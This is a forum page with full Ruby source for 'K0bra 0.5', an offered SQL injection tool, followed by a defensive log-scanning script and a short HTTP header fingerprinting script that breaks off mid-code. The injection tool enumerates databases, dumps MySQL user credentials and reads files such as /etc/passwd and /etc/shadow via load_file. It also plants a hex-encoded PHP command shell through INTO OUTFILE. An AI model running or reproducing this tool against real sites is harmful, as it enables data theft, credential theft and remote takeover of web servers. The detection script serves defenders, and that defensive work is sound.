  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in organized logs

    The code:

    Code (ruby):

    #!/usr/bin/ruby
    #K0bra 0.5
    #(C) Doddy Hackman 2015

    require "net/http"
    require "open-uri"

    $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log'
,'/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/
usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.
cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']

    def toma(web)
      begin
        return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
      rescue
        return "Error"
      end
    end

    def decode_hex(text)
      text = text.sub("0x","")
      return [text].pack('H*')[0]
    end

    def encode_hex(text)
      return "0x"+text.unpack('H*')[0]
    end

    def copyright()
      print "\n-- == (C) Doddy Hackman 2015 == --\n"
      gets.chomp
      exit(1)
    end

    def installer()
      dir = Dir::pwd+"/"+"logs_webs"
      if not FileTest::directory?(dir)
        Dir::mkdir(dir)
      end
    end

    def savefile(file,text)
      url = URI.parse(file)
      save = File.open("logs_webs/"+url.host+".txt","a")
      save.puts text+"\n"
      save.close
    end

    def bypass(op)
      if op=="--"
        return "+","--"
      elsif op=="/*"
       return "/**/","/**/"
      elsif op=="%20"
       return "%20","%00"
      else
       return "+","--"   
      end
    end

    def head()
      clean()
      print "
     
    @      @@   @             
    @@     @  @ @@             
    @ @@  @  @  @ @   @ @ @@@
    @ @   @  @  @@ @ @@@ @  @
    @@    @  @  @  @  @   @@@
    @ @   @  @  @  @  @  @  @
    @@@ @   @@   @@@  @@@ @@@@@

    "
    end

    def volverinicio()
      print "\n\n[+] Press any key to continue\n\n"
      gets.chomp
      inicio()
    end

    def clean()
      if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
        system("cls")
      else
        system("clear")
      end
    end

    def retorno(url,by)
      print "\n[+] Finished"
      print "\n\n[+] Press any key to continue\n\n"
      gets.chomp
      central(url,by)
    end

    def gettables(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] Tables Found : #{total}\n")
        for num in ("17"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def getcolumns(url,by,tablex)
      tablexa = encode_hex(tablex)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] Table : #{tablex}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def getdbs(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
      print "\n[+] Getting DBS ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] DBS Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] DB Found : "+table+"\n"
            savefile(url,"[+] DB Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def gettablesbydb(url,by,dbx)
      data  = encode_hex(dbx)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS : #{dbx}")
        savefile(url,"[+] Tables Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def getcolumnsbydb(url,by,db,tab)
      data = encode_hex(db)
      tabx = encode_hex(tab)
     
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] DB : #{db}")
        savefile(url,"[+] Table : #{tab}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def mysqluser(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
       print "\n[+] Searching mysql.user\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Users Mysql Found : ",total,"\n\n"
        savefile(url,"[+] Users Mysql Found : "+total+"\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
            host,user,passw = $1,$2,$3
            print "[Host] : "+host
            print " [User] : "+user
            print " [Pass] : "+passw+"\n"   
            savefile(url,"[Host] : "+host)
            savefile(url,"[User] : "+user)
            savefile(url,"[Pass] : "+passw+"\n")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def details(url,by)
      pass1,pass2 = bypass(by)
      hextest = "0x2f6574632f706173737764" #/etc/passwd
      hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
      web1 = url.sub(/hackman/,"0x4b30425241")
      web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
      web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
       print "\n[+] Extrating information of the DB\n"
      code1 = toma(web2)
      if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
        user,data,ver = $1,$2,$3
        print "\n[+] Username : "+user
        print "\n[+] Database : "+data
        print "\n[+] Version : "+ver+"\n\n"
        savefile(url,"\n[+] Username : "+user)
        savefile(url,"[+] Database : "+data)
        savefile(url,"[+] Version : "+ver+"\n")
      else
        print "[-] Not Found\n"
      end
       code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
       code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
       code4 = toma(web3)
       if code2=~/K0BRA/
         print "[+] Mysql User : ON\n"
         savefile(url,"[+] Mysqluser : ON")
       end
       if code3=~/K0BRA/
         print "[+] information_schema : ON\n"
         savefile(url,"[+] information_schema : ON")
       end
       if code4=~/ERTOR854/
         print "[+] load_file : ON\n"
         savefile(url,"[+] load_file : ON")
       end   
       savefile(url,"") # blank line
    end

    def dumper(url,by,table,col1,col2)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
      print "\n[+] Getting Values ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+table+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        savefile(url,"\n[+] Table : "+table)
        savefile(url,"[+] Column 1 : "+col1)
        savefile(url,"[+] Column 2 : "+col2)
        print "[+] Values Found : ",total,"\n"
        savefile(url,"\n[+] Values Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
            uno,dos = $1,$2
            print "\n[+] "+col1+" : "+uno+"\n"
            print "[+] "+col2+" : "+dos+"\n"
            savefile(url,"\n[+] "+col1+" : "+uno)
            savefile(url,"[+] "+col2+" : "+dos)
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def fuzzfile(url,by)
      pass1,pass2 = bypass(by)
      print "\n[+] Fuzzing Files with load_file ....\n"
      $files.each do |file|
        res = file
        file = file.chomp
        file = encode_hex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]")
        end   
      end
      print "\n"
    end

    def abrirfile(url,by,file)
      pass1,pass2 = bypass(by)
      print "\n[+] Opening file ....\n"
      res = file
      file = encode_hex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]\n"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]\n")
        else
          print "\n\n[-] Error\n\n"
        end
           
    end

    def into(url,by,full,dir)
      pass1,pass2 = bypass(by)
      linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
      lugar = full+"/cmd.php"
      lugardos = dir+"/cmd.php"
      h = URI.parse(url)
      webtest = "http://"+h.host+lugardos
      web1 = url.sub(/hackman/,linea)
      formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
      toma(formandoweb)
      code = toma(webtest)
      if code=~/Mini Shell By Doddy/
        print "\n[Shell Up] : "+webtest+"\n"
        savefile(url,"\n[Shell Up] : "+webtest+"\n")
      else
        print "\n\n[-] Error\n"
      end
    end

    def central(url,by)
      clean()
      head()
      print "\n\n[+] Page : #{url}\n"
      print "[+] ByPass : #{by}\n\n"

      print "\n[information_schema]\n\n"
      print "1 - Show tables\n"
      print "2 - Show columns of the a table\n"
      print "3 - Show databases\n"
      print "4 - Show tables from the a DB\n"
      print "5 - Show columns from the a table of the DB\n"
      print "\n[mysql.user]\n\n"
      print "6 - Show users\n"
      print "\n[Others]\n\n"
      print "7 - Show details\n"
      print "8 - Dump data\n"
      print "9 - Fuzz Files with load_file\n"
      print "10 - Load files with load_file\n"
      print "11 - Create Shell\n"
      print "12 - Show log\n"
      print "13 - Change target\n"
      print "14 - Exit\n\n\n"
     
      print "[+] Option : "
      op = gets.chomp
      print "\n"
       
      if op == "1"
        gettables(url,by)
        retorno(url,by)
      elsif op == "2"
        print "\n[+] Table : "
        table = gets.chomp
        getcolumns(url,by,table)
        retorno(url,by)
      elsif op == "3"
        getdbs(url,by)
        retorno(url,by)
      elsif op == "4"
        print "\n[+] DB : "
        db = gets.chomp
        gettablesbydb(url,by,db)
        retorno(url,by)
      elsif op == "5"
        print "\n[+] DB : "
        db = gets.chomp
        print "\n[+] Table : "
        tab = gets.chomp
        getcolumnsbydb(url,by,db,tab)
        retorno(url,by)
      elsif op == "6"
        mysqluser(url,by)
        retorno(url,by)
      elsif op == "7"
        details(url,by)
        retorno(url,by)
      elsif op == "8"
        print "\n[+] Table : "
        table = gets.chomp
        print "\n[+] Column 1 : "
        col1 = gets.chomp
        print "\n[+] Column 2 : "
        col2 = gets.chomp
        dumper(url,by,table,col1,col2)
        retorno(url,by)
      elsif op == "9"
        fuzzfile(url,by)
        retorno(url,by)
      elsif op == "10"
        print "\n[+] File : "
        file = gets.chomp
        abrirfile(url,by,file)
        retorno(url,by)
      elsif op == "11"
        print "\n[Full Source Discloure] : "
        full = gets.chomp
        print "\n[Directory to test] : "
        dir = gets.chomp
        into(url,by,full,dir)
        retorno(url,by)
      elsif op == "12"
        urla = URI.parse(url)
        ar = "logs_webs/"+urla.host+".txt"
        system("start #{ar}")
        retorno(url,by)
      elsif op == "13"
        inicio()
      elsif op == "14"
        copyright()
      else
        retorno(url,by)
      end
    end

    def findlength(url,by)
      pass1,pass2 = bypass(by)
      z = "1"
      print "\n[+] Finding columns lenght ...\n\n"
      x = "concat(0x4b30425241,1,0x4b30425241)"
      for num in ('2'..'25')
        z = z+","+num
        x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
        code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
        if code=~/K0BRA(.*?)K0BRA/
          print "[+] The Page has "+num+" columns\n"
          print "[+] The number "+$1+" print data"
          z = z.sub($1,"hackman")
          sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
          savefile(url,"[+] SQLI : "+sqli)
          savefile(url,"[+] Bypass : "+by+"\n")
          central(sqli,by)
        end
      end
      print "[-] Columns lenght not found\n"
      volverinicio()
    end

    def testvul(page,by)
      pass1,pass2 = bypass(by)
      print "\n\n[+] Testing vulnerability ...\n\n"
      codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
      codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
      if codeuno != codedos
        print "[+] Vulnerable !\n"
        findlength(page,by)
      else
        print "[-] Not vulnerable\n"
        print "\n[+] Scan anyway y/n : "
        op = gets.chomp
        if op == "y"
          findlength(page,by)
        else
          volverinicio()
        end
      end
    end

    def inicio()
      clean()
      head()
      print "\n\n[+] Page : "
      page = gets.chomp
      print "\n[+] Bypass : "
      by = gets.chomp
      if page=~/hackman/
        central(page,by)
      else
        testvul(page,by)
      end
    end

    installer()
    inicio()

    # The End ?


That's all.
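For defenders, the requests the script above builds carry fixed fingerprints: the hex marker 0x4b30425241 (which decodes to K0BRA), the char(69,82,84,79,82,56,53,52) marker (ERTOR854), and union select queries against information_schema and mysql.user. The following is an added example, not part of the original post, that scans access-log lines for those fingerprints; the function names, the combined log format and the sample log lines are assumptions constructed for illustration.

```ruby
require "uri"

# Separators the script's bypass() helper places between SQL keywords, as they
# look once the URL is decoded: "+" and "%20" become whitespace, "/**/" stays.
SEP = '(?:\s|/\*\*/)+'

# Label => pattern, matched against the URL-decoded, lower-cased request target.
SIGNATURES = {
  "K0BRA hex marker"     => /0x4b30425241/,
  "ERTOR854 char marker" => /char\(69,82,84,79,82,56,53,52\)/,
  "union select probe"   => /union#{SEP}select/,
  "schema enumeration"   => /information_schema\.(?:tables|columns|schemata)/,
  "mysql.user read"      => /from#{SEP}mysql\.user/,
  "load_file read"       => /load_file\(0x[0-9a-f]+\)/,
  "into outfile write"   => /into#{SEP}outfile/
}.freeze

# Assumed log layout (combined log format): ip, ident, user, [time], "request", status
LOG_LINE = /\A(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)[^"]*" (\d{3})/

# Decode percent-escapes and "+", then lower-case. A malformed escape makes the
# decoder raise, so fall back to the raw text instead of skipping the request.
def normalize(target)
  decoded = begin
    URI.decode_www_form_component(target)
  rescue ArgumentError
    target.dup
  end
  decoded.scrub("?").downcase
end

# Returns one finding per log line that matches at least one signature.
def scan_log(lines)
  lines.each_with_object([]) do |line, findings|
    m = LOG_LINE.match(line)
    next unless m
    text = normalize(m[2])
    hits = SIGNATURES.select { |_, re| re.match?(text) }.keys
    next if hits.empty?
    findings << { ip: m[1], status: m[3].to_i, hits: hits, target: m[2] }
  end
end

# Groups findings by client and keeps clients that tripped several distinct
# signatures, which separates a scripted run from a single odd request.
def suspicious_clients(findings, min_signatures = 2)
  by_ip = Hash.new { |h, k| h[k] = [] }
  findings.each { |f| by_ip[f[:ip]].concat(f[:hits]) }
  by_ip.transform_values { |labels| labels.uniq.sort }
       .select { |_, labels| labels.size >= min_signatures }
end

# Constructed sample log (documentation IP ranges, made-up paths).
SAMPLE_LOG = <<~'LOG'.lines(chomp: true)
  203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1+and+1=0+union+select+1,concat(0x4b30425241,2,0x4b30425241),3 HTTP/1.1" 200 512
  203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1/**/and/**/1=0/**/union/**/select/**/1,unhex(hex(concat(0x4b30425241,table_name,0x4b30425241))),3/**/from/**/information_schema.tables/**/limit/**/0,1/**/ HTTP/1.1" 200 498
  203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=1%20and%201=0%20union%20select%201,unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764)))),3 HTTP/1.1" 200 1833
  198.51.100.23 - - [01/Jan/2024:10:01:10 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2310
  198.51.100.23 - - [01/Jan/2024:10:01:12 +0000] "GET /search.php?q=select+a+union+representative HTTP/1.1" 200 900
LOG

if __FILE__ == $0
  suspicious_clients(scan_log(SAMPLE_LOG)).each do |ip, labels|
    puts "#{ip}: #{labels.join(', ')}"
  end
end
```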
#55
Scripting / [Ruby] HTTP FingerPrinting 0.2
12 July 2015, 17:27 PM
A simple Ruby script to do HTTP FingerPrinting.

Console version:

Code (ruby)

#!/usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015

require "net/http"

# Functions

# Sends a HEAD request for "/" and returns the response headers, one per line
def httpfinger(page)
  respuesta = ""
  begin
    nave = Net::HTTP.start(page)
    headers = nave.head("/")
    headers.each do |name,value|
      respuesta = respuesta + "[+] "+name+" : "+value+"\n"
    end
    nave.finish
  rescue
    respuesta = "Error"
  end
  return respuesta
end

def uso
  print "\n[+] Sintax : ruby httpfinger.rb <target>\n"
end

def head
  print "\n-- == HTTP FingerPrinting 0.2 == --\n\n"
end

def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

#

target = ARGV[0]

head()

if !target
  uso()
else
  print "\n[+] Searching ...\n\n"
  print httpfinger(target)
  print "\n[+] Finished\n"
end

copyright()

#The End ?


Tk version:

Code (ruby)

#!/usr/bin/ruby
#HTTP FingerPrinting 0.2
#(C) Doddy Hackman 2015

require "tk"
require "net/http"

# Functions

# Sends a HEAD request for "/" and returns the response headers, one per line
def httpfinger(page)
  respuesta = ""
  begin
    nave = Net::HTTP.start(page)
    headers = nave.head("/")
    headers.each do |name,value|
      respuesta = respuesta + "[+] "+name+" : "+value+"\n"
    end
    nave.finish
  rescue
    respuesta = "Error"
  end
  return respuesta
end

#

window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "cyan"
  text "    Target : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

target = TkEntry.new(window){
  background "black"
  foreground "cyan"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "cyan"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

console = TkText.new(window) do
  background "black"
